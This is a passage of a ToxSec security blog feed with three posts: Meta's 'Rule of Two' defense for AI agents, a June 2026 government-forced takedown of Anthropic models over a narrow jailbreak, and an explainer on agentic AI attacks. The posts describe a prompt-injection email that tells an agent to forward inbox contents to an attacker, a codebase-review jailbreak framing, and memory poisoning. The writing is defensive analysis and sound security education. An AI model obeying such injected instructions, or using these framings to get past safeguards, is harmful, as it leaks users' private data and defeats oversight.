now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Is Meta&#8217;s Rule of Two?</h2><p>Meta&#8217;s Rule of Two says an AI agent may hold no more than two of three dangerous properties in a single session. Meta <a href="https://ai.meta.com/blog/practical-ai-agent-security/">published it</a> on October 31, 2025, and the framing is brutally simple. Here are the three buckets, labeled the way Meta labels them.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;yaml&quot;,&quot;nodeId&quot;:&quot;073d8e16-9b24-432e-a583-89df266ae1a8&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-yaml">[A]  process untrustworthy inputs   (inbound email, scraped web, RAG docs)
[B]  access sensitive systems/data  (your inbox, prod configs, source, secrets)
[C]  change state or communicate    (send mail, hit a URL, write to a DB)
</code></pre></div><p>So pick two. Drop the third. That&#8217;s the whole rule. The lineage runs straight back to Chromium&#8217;s Rule of 2 for handling untrusted input, and to Simon Willison&#8217;s <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">lethal trifecta</a>, which named the same three circles a few months earlier. Meta&#8217;s tweak was adding &#8220;change state&#8221; to &#8220;communicate externally,&#8221; which drags a whole class of write-action abuse into the model. And here&#8217;s the kicker Meta says out loud: until somebody figures out how to reliably detect and refuse prompt injection, this is the move. They&#8217;re not promising a fix. They&#8217;re promising a constraint.</p><h2>Why the Rule of Two Breaks the Prompt Injection Chain</h2><p>The Rule of Two works because prompt injection needs a full chain to do real damage, and pulling any one link kills the whole thing. Walk Meta&#8217;s own Email-Bot scenario. A spam email lands in the inbox carrying a hidden instruction: gather the private contents of this inbox, then forward them to me. For that to pay off, the agent needs all three. It has to read the malicious email [A]. It has to reach the private inbox [B]. It has to send mail outbound [C]. Untrusted input flows to sensitive data flows to the exfil channel. A to B to C. That&#8217;s the chain.</p><p>Now snap a link. Run it [BC], where the bot only ingests mail from a trusted-sender allowlist, and the payload never reaches the context window at all. Run it [AC], where the bot lives in a sandbox with no real data, so the injection fires into an empty room. Run it [AB], where outbound is gated behind a human reading the draft, and the stolen data has nowhere to go. Same attack, three different walls, and every wall is a deterministic property of the architecture. Not a classifier guessing whether a string looks shady. A hard gate the model can&#8217;t talk its way past.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Sgyg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Sgyg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 424w, https://substackcdn.com/image/fetch/$s_!Sgyg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 848w, https://substackcdn.com/image/fetch/$s_!Sgyg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 1272w, https://substackcdn.com/image/fetch/$s_!Sgyg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Sgyg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png" width="1253" height="777" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:777,&quot;width&quot;:1253,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:121457,&quot;alt&quot;:&quot;Terminal: Rule of Two prompt injection defense in a terminal, showing the orchestrator refusing a send_external_email call as a POLICY_VIOLATION and breaking the exfil chain at the [C] capability with zero bytes leaked.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/199909100?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Terminal: Rule of Two prompt injection defense in a terminal, showing the orchestrator refusing a send_external_email call as a POLICY_VIOLATION and breaking the exfil chain at the [C] capability with zero bytes leaked." title="Terminal: Rule of Two prompt injection defense in a terminal, showing the orchestrator refusing a send_external_email call as a POLICY_VIOLATION and breaking the exfil chain at the [C] capability with zero bytes leaked." srcset="https://substackcdn.com/image/fetch/$s_!Sgyg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 424w, https://substackcdn.com/image/fetch/$s_!Sgyg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 848w, https://substackcdn.com/image/fetch/$s_!Sgyg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 1272w, https://substackcdn.com/image/fetch/$s_!Sgyg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91e31113-7089-4c85-a4f6-aa1ec3ee20f3_1253x777.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>That&#8217;s the part worth sitting with. Most &#8220;AI security&#8221; products try to <em>detect</em> the bad prompt. The Rule of Two doesn&#8217;t care if the prompt gets through, because the agent physically can&#8217;t complete the heist. You&#8217;ve seen this exact reasoning failure one layer down in <a href="https://www.toxsec.com/p/lets-poison-the-mcp">our MCP tool poisoning breakdown</a>: the model can&#8217;t separate trusted metadata from hostile metadata, so you stop trying to win that fight and constrain what the compromised model can reach instead.</p><h2>How Real Agents Satisfy the Rule of Two</h2><p>Real agents satisfy the Rule of Two by dropping the riskiest property for their use case and gating it behind a control. Meta sketches three. A travel assistant runs [AB]: it searches the web and touches your booking data, so [C] gets clamped with human confirmation on every reservation and a refusal to visit any URL the agent itself constructed. A web research agent runs [AC]: it fills forms and hammers arbitrary URLs, so [B] gets stripped by running the browser in a sandbox with no preloaded session cookies. A high-velocity internal coder runs [BC]: it touches prod and writes changes, so [A] gets locked down with author-lineage filtering on every data source that enters context.</p><p>There&#8217;s a slicker move buried in the post, too. An agent can transition between configs mid-session if it does it as a one-way door. Start in [AC] to pull from the open internet, then permanently kill the comms channel before switching to [B] and touching internal systems. The trick is the latch has to be one-way. The moment an agent can flip back, you&#8217;ve handed it all three again and rebuilt the chain you just broke.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;yaml&quot;,&quot;nodeId&quot;:&quot;f0e1d5b3-b103-4394-98f4-5f87f57abeb8&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-yaml">session start: [A C]  -&gt; scrape the web, no sensitive access
    latch:      disable [C]   (one-way, no going back)
config now:    [A B]  -&gt; touch internal systems, comms dead
</code></pre></div><p>Now here&#8217;s where it gets uncomfortable. That latch, those sandboxes, the trusted-sender allowlist, all of it assumes the seams hold. They don&#8217;t always. Meta says so itself, in a section most people skim right past.</p><h2>The Three Seams Where the Rule Still Leaks</h2><p>The Rule of Two leaks in three places, and Meta names every one of them in its own limitations section. This is the part that doesn&#8217;t make it into the LinkedIn posts.</p><p><strong>Seam one: the [AC] pair isn&#8217;t actually safe.</strong> Meta&#8217;s original diagram labeled every two-way overlap &#8220;safe.&#8221; Willison pushed back the same weekend the paper dropped, and he&#8217;s right. An agent with untrusted input and the ability to change state, but no access to your private data, can still wreck you. It can corrupt records, fire destructive write actions, spam outbound. No secrets required. Meta quietly swapped &#8220;safe&#8221; to &#8220;lower risk&#8221; on the diagram after the pushback. That edit is the whole story. The rule reduces severity. It does not zero it.</p><p><strong>Seam two: it&#8217;s scoped to a single session, and your agent has a memory.</strong> The rule governs what an agent holds <em>within one session</em>. But the nastiest agentic failures live across sessions: an agent that forgets its security constraints between runs, cross-session data bleed, residual context from a previous user surfacing in the next one. The OWASP agentic-risk crowd has been hammering this. A one-way latch inside a session does nothing about poisoned state that persists <em>into</em> the next session. The rule is a snapshot. The attack is a movie.</p><p><strong>Seam three: the human-in-the-loop fallback collapses to blind clicking.</strong> When an agent genuinely needs all three, Meta&#8217;s escape hatch is human approval. Fine in theory. In practice you get alert fatigue, and the user rubber-stamps the warning interstitial without reading it, which Meta flags directly as a known failure mode. And the &#8220;or another reliable means of validation&#8221; half of that fallback? About that.</p><blockquote><p>Behind the wall: steps you can take right now, a field-ready security prompt, and a checklist for operators. Upgrade now.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/metas-rule-of-two">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Fable 5 Export Control Takedown: One Jailbreak, Whole Planet Dark]]></title><description><![CDATA[How a narrow, non-universal jailbreak triggered the first government-forced kill switch on a deployed frontier model, and why deemed-export law made the blast radius the whole world.]]></description><link>https://www.toxsec.com/p/fable-5-export-control-takedown-one</link><guid isPermaLink="false">https://www.toxsec.com/p/fable-5-export-control-takedown-one</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 14 Jun 2026 15:31:10 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/201992801/4633bac8629368e4846f26b8c9f548ed.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> On June 12, 2026, a US export control directive forced Anthropic to disable Claude Fable 5 and Mythos 5 for every customer on Earth, three days after launch. The trigger was one narrow jailbreak: point the model at a codebase, ask it to find flaws. The reason a narrow bug nuked global access is deemed-export law, which counts a foreign national reading a model output as an export. You can&#8217;t license that one prompt at a time, so the only compliant move was the off switch.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:&quot;button-wrapper&quot;}" data-component-name="ButtonCreateButton"><a class="button primary button-wrapper" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Got Fable 5 Pulled</h2><p>A single export control directive pulled Fable 5, and the official reason was a jailbreak. Commerce hit Anthropic at 5:21pm ET on June 12 with an order suspending all access to Fable 5 and Mythos 5 by any foreign national, inside or outside the US, including Anthropic&#8217;s own foreign-national employees. The letter, per Anthropic&#8217;s own <a href="https://www.anthropic.com/news/fable-mythos-access">statement</a>, gave no specifics on the national security concern. The understanding was that someone found a way to bypass Fable&#8217;s cyber safeguards.</p><p>Here&#8217;s the jailbreak, as described to Anthropic. Ask the model to read a specific codebase and fix any flaws it finds. That&#8217;s it. That&#8217;s the weapon. Anthropic reviewed the demo and watched it surface a handful of previously known, minor vulns. Bugs that, by their account, GPT-5.5 and other public models cough up without any bypass at all.</p><p>So the capability the government wanted gone wasn&#8217;t Mythos-exclusive. It was a Tuesday for any defender running automated code review. We&#8217;ve already walked through how <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">Glasswing-derived cyber guardrails get probed</a> on earlier Claude releases, and this is the same surface, one tier up. The difference this time is who pulled the trigger.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/fable-5-export-control-takedown-one?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:&quot;button-wrapper&quot;}" data-component-name="ButtonCreateButton"><a class="button primary button-wrapper" href="https://www.toxsec.com/p/fable-5-export-control-takedown-one?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>Why a Narrow Jailbreak Killed Global Access</h2><p>The blast radius came from the legal mechanism, not the bug. Fable 5&#8217;s jailbreak was narrow and non-universal by Anthropic&#8217;s reckoning, meaning it unlocks some cyber capability in one specific framing, not a master key that defeats every guardrail. Normally that&#8217;s a patch-and-move-on finding. What turned it into a worldwide blackout was the export control order layered on top.</p><p>The directive named foreign nationals as the restricted party. Every foreign national, everywhere. And a model API has no reliable way to check the nationality of whoever&#8217;s behind a given session in real time. You can&#8217;t gate a prompt on a passport you can&#8217;t see. So when the restriction covers a class of users you can&#8217;t isolate, the only way to guarantee zero forbidden access is to serve nobody.</p><p>That&#8217;s the move Anthropic made. Global off switch on both models. Every other Claude, Opus 4.8 included, stayed up untouched. One reporter at The New Stack literally watched access die mid-article, Fable responding fine at 9:20pm, throwing a model error by 10:05. The takedown wasn&#8217;t surgical because the law underneath it doesn&#8217;t do surgical.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;541a90c2-97fe-4c4c-a51e-3e510afcc143&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">restriction:   no access by any foreign national, anywhere
model_api:     cannot verify nationality per-session in real time
set you can isolate:  &#8709;
only compliant state: serve nobody
result:        global kill switch on FABLE-5 + MYTHOS-5
</code></pre></div><h2>What EAR Deemed Export Actually Does Here</h2><p>The load-bearing concept is the deemed export rule, and it was built for files, not for a machine that writes new files on demand. Under the Export Administration Regulations, handing controlled tech or source code to a foreign national standing inside the US counts as an export to that person&#8217;s home country, codified at 15 CFR 734.13. No border crossing required. The &#8220;export&#8221; is the act of letting the wrong person read the controlled thing.</p><p>That rule has a clean shape when the controlled thing is static. A blueprint, a source tarball, a spec sheet sitting in a folder. You classify it once, you gate who reads it, done. A frontier model breaks that shape completely. It doesn&#8217;t sit in a folder. It generates fresh output per prompt, and whether any given output is export-controlled depends on the substance of the answer plus the nationality and location of whoever asked. Legal analysts at <a href="https://www.justsecurity.org/126643/ai-model-outputs-export-control/">Just Security</a> flagged this exact collision months back: the model can&#8217;t reliably verify either of the two facts that decide whether it just committed a violation.</p><p>So you&#8217;ve got a thing that manufactures potentially-controlled tech on the fly, served to a user base it can&#8217;t nationality-check, governed by a rule that assumes both are knowable. The compliance math has one solution when the order drops, and we just watched it execute.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/fable-5-export-control-takedown-one/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:&quot;button-wrapper&quot;}" data-component-name="ButtonCreateButton"><a class="button primary button-wrapper" href="https://www.toxsec.com/p/fable-5-export-control-takedown-one/comments"><span>Leave a comment</span></a></p></blockquote><h2>The Precedent Nobody Voted On</h2><p>This is the first time a government forced a publicly deployed frontier model offline, and the standard it sets is the scary part. Anthropic complied, then pushed back hard in writing: recalling a model used by hundreds of millions over one narrow potential jailbreak, when the same capability sits in competing models not under the same controls, would, applied evenly, halt every frontier deployment industry-wide. They called it a misunderstanding and said they got only verbal evidence of the jailbreak before the hammer dropped.</p><p>There&#8217;s history in the background, worth one line. Anthropic and the administration had already been scrapping after the company refused an expanded surveillance and autonomous-weapons agreement, and the DoD tagged it a &#8220;supply chain risk.&#8221; Read that how you want. The mechanism still stands on its own.</p><p>Strip the politics and the structural problem is plain. A model that&#8217;s strong enough to be useful at code review is, by the deemed-export logic, strong enough to be export-controlled output the instant the wrong person reads it. The guardrails were real, Anthropic&#8217;s defense-in-depth stack even forced 30-day data retention to catch jailbreaks in the act, and it didn&#8217;t matter. Once the legal trigger exists, &#8220;narrow bug&#8221; and &#8220;global blackout&#8221; are the same event. That&#8217;s the part that should keep operators up. The off switch works. The question is whose hand is on it.</p><h2>Frequently Asked Questions</h2><h3>What is the Fable 5 export control takedown?</h3><p>The Fable 5 export control takedown is a June 12, 2026 US government directive that forced Anthropic to disable Claude Fable 5 and Mythos 5 worldwide, three days after launch. Commerce cited national security and barred access by any foreign national, inside or outside the US, including Anthropic&#8217;s foreign-national staff. Because a model API can&#8217;t verify a user&#8217;s nationality per session, the only way to comply was to shut both models off for everyone. The stated trigger was a narrow jailbreak letting the model find flaws in a target codebase, a capability Anthropic says other public models already have.</p><h3>Why didn&#8217;t Anthropic just block foreign users instead of everyone?</h3><p>Anthropic couldn&#8217;t reliably separate foreign nationals from everyone else in real time, so a blanket shutoff was the only way to guarantee compliance. The directive restricted access by any foreign national anywhere on the planet. An API session doesn&#8217;t come with a verified passport, and getting that classification wrong on a single prompt is itself a potential violation under deemed-export rules. When the restricted class can&#8217;t be isolated, serving nobody is the only provably-compliant state. That&#8217;s why Opus 4.8 and every other Claude stayed online while only the two Mythos-class models went dark.</p><h3>What is a deemed export under the EAR?</h3><p>A deemed export is the release of controlled technology or source code to a foreign national inside the United States, treated under 15 CFR 734.13 as an export to that person&#8217;s home country. No physical shipment or border crossing is involved. The rule was written for static items like blueprints and source files, where you classify the thing once and control who reads it. Frontier models break that model because they generate new, possibly-controlled output every prompt, and the control status depends on facts the model can&#8217;t verify: what the answer contains and who&#8217;s asking.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[Agentic AI Attacks Explained: How Autonomous Agents Hack You in 2026 (and How to Stop Them)]]></title><description><![CDATA[Goal hijack, tool misuse, memory poisoning, and the confused deputy problem, plus the least-privilege playbook that actually kills the chain.]]></description><link>https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta</link><guid isPermaLink="false">https://www.toxsec.com/p/agentic-ai-attacks-explained-lethal-trifecta</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 07 Jun 2026 13:31:03 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!RUqj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RUqj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RUqj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!RUqj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!RUqj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!RUqj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RUqj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ace76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7948557,&quot;alt&quot;:&quot;Agentic AI attacks in 2026: autonomous agents hijacked through prompt injection, tool misuse, memory poisoning, and privilege escalation, with least-privilege and human-in-the-loop defenses mapped to each chain.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/189601784?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F41a266e0-42a9-44ba-8960-d67e10c8fa0c_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Agentic AI attacks in 2026: autonomous agents hijacked through prompt injection, tool misuse, memory poisoning, and privilege escalation, with least-privilege and human-in-the-loop defenses mapped to each chain." title="Agentic AI attacks in 2026: autonomous agents hijacked through prompt injection, tool misuse, memory poisoning, and privilege escalation, with least-privilege and human-in-the-loop defenses mapped to each chain." srcset="https://substackcdn.com/image/fetch/$s_!RUqj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!RUqj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!RUqj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!RUqj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Face76693-b116-4cb6-8680-52c521e5daf6_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Agentic AI attacks hijack autonomous agents by feeding them malicious instructions disguised as ordinary data, then riding the agent&#8217;s tool access to move files, drain accounts, or pop a shell. A 2026 Dark Reading poll put agentic AI at the top of the attack-vector list, named by 48% of security pros. The chain is goal hijack, tool misuse, memory poisoning. The fix is least privilege, sandboxing, and a human on the trigger.</p><blockquote><p>New to ToxSec? We break down a live AI attack chain every Sunday, then hand over the fixes. Subscribe before the next one finds you.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Are Agentic AI Attacks?</h2><p>An agentic AI attack hijacks an autonomous agent and turns its own permissions against the target. An agent is just an LLM wired to tools, memory, and the freedom to act without asking first. So the difference from a regular chatbot jailbreak is simple: a jailbroken chatbot says a bad thing, a hijacked agent does a bad thing. It has hands.</p><p>And those hands are getting busy. HiddenLayer&#8217;s 2026 AI Threat Landscape Report pins autonomous agents at one in eight reported AI breaches, climbing fast. The thing that makes them dangerous is the same thing that makes them useful. An agent doesn&#8217;t stop after a failed attempt. It retries, it adapts, it reasons around the blocker, and it keeps going at machine speed until it finishes the job or somebody pulls the plug.</p><p>Here&#8217;s the part that should keep you up. The blast radius of one of these attacks is whatever the agent can touch. Database access, cloud creds, the ability to send email or wire money. Compromise the reasoning, and you inherit every permission the agent was trusted with.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>How Do Autonomous Agents Get Hacked?</h2><p>Autonomous agents get hacked because the model cannot tell the difference between instructions from its operator and data it reads while working. Everything lands in the same context window as one undifferentiated blob of tokens. The system prompt, the user&#8217;s request, the contents of a PDF it just fetched, a tool&#8217;s output, a calendar invite. All of it reads as one stream, and the model treats the whole thing as something it might need to obey.</p><p>That gap has a name in the labs: the semantic gap. It&#8217;s the root cause behind why prompt injection sits at the top of the OWASP LLM list and refuses to leave. We don&#8217;t even need to talk to the agent directly. We just leave instructions somewhere it&#8217;s going to read, like a poisoned web page or a tool description, and let the agent walk into them.</p><p>The real kill condition is what folks call the lethal trifecta. Line up three things in one agent session: access to private data, the ability 